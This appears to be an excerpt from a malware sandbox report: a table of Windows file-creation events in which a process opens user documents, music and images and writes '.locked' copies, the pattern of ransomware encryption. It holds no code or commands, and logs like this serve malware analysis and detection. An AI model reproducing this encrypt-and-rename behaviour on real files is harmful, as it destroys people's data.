| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\HSrjj2x8m w.pdf.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\HSrjj2x8m w.pdf.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\OUCsQYE.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\OUCsQYE.xls.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\OUCsQYE.xls.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\X2jUDm7UI3Bf1ICa73D\RCk4e.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\X2jUDm7UI3Bf1ICa73D\RCk4e.pdf.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\X2jUDm7UI3Bf1ICa73D\RCk4e.pdf.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\9LmLjA8pk0rGO1UCb\1FC6.ppt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\9LmLjA8pk0rGO1UCb\1FC6.ppt.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\9LmLjA8pk0rGO1UCb\1FC6.ppt.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\g dNFcb6FnjnR\ES3 _Gqz.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\g dNFcb6FnjnR\ES3 _Gqz.xls.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\g dNFcb6FnjnR\ES3 _Gqz.xls.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\A3cC6ntwzf6rjOkD.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\A3cC6ntwzf6rjOkD.pdf.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\A3cC6ntwzf6rjOkD.pdf.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\jB6WY0ijF-NQi-J.ppt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\jB6WY0ijF-NQi-J.ppt.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\jB6WY0ijF-NQi-J.ppt.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\OTVx6 RT5zx2uB.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\OTVx6 RT5zx2uB.doc.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\OTVx6 RT5zx2uB.doc.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\A3TyfwL K9v.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\A3TyfwL K9v.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\A3TyfwL K9v.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\aHsxHvVGrhKQ.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\aHsxHvVGrhKQ.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\aHsxHvVGrhKQ.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\F_mh2z6BtFT7Kos_6G.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\F_mh2z6BtFT7Kos_6G.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\xeBdZg2QrMG--2HBSRnm.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\xeBdZg2QrMG--2HBSRnm.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\xeBdZg2QrMG--2HBSRnm.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\XTIpdzJyOmWc9OAT7Gp.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\XTIpdzJyOmWc9OAT7Gp.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\XTIpdzJyOmWc9OAT7Gp.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\NDeIpAkMX1CfmQx5QtF.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\NDeIpAkMX1CfmQx5QtF.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\NDeIpAkMX1CfmQx5QtF.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\qmFOtY5GmgYlzu-S.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\qmFOtY5GmgYlzu-S.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\qmFOtY5GmgYlzu-S.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\xNEvPCIqTV.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\xNEvPCIqTV.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\xNEvPCIqTV.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\863xTgYliRZqB.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\863xTgYliRZqB.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\863xTgYliRZqB.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\bqmJjjj-.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\bqmJjjj-.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\bqmJjjj-.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\BYp-GiUUBUdzAuZkH3.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\BYp-GiUUBUdzAuZkH3.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\BYp-GiUUBUdzAuZkH3.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\DEMSQUqRTksP.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\DEMSQUqRTksP.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\DEMSQUqRTksP.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\KU7C.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\KU7C.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\KU7C.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\Fa3z5avrpn.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\Fa3z5avrpn.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\Fa3z5avrpn.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\j4Ld8uBhqmuHP3KxL4h.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\j4Ld8uBhqmuHP3KxL4h.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\j4Ld8uBhqmuHP3KxL4h.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW\kffcM8HKE.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW\kffcM8HKE.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW\kffcM8HKE.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\ckKwcItn1NQ8UaZHXZ.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\ckKwcItn1NQ8UaZHXZ.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\ckKwcItn1NQ8UaZHXZ.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\66JPt-oVzJiHw.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\66JPt-oVzJiHw.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\66JPt-oVzJiHw.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\bXc_1_mUh tfUnHVBj5.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\bXc_1_mUh tfUnHVBj5.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\bXc_1_mUh tfUnHVBj5.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\dDv0VhBvkOgUsrdn0wQA.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\dDv0VhBvkOgUsrdn0wQA.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\dDv0VhBvkOgUsrdn0wQA.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\kMgbOIpQMxVFXlnG7.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\kMgbOIpQMxVFXlnG7.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\kMgbOIpQMxVFXlnG7.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
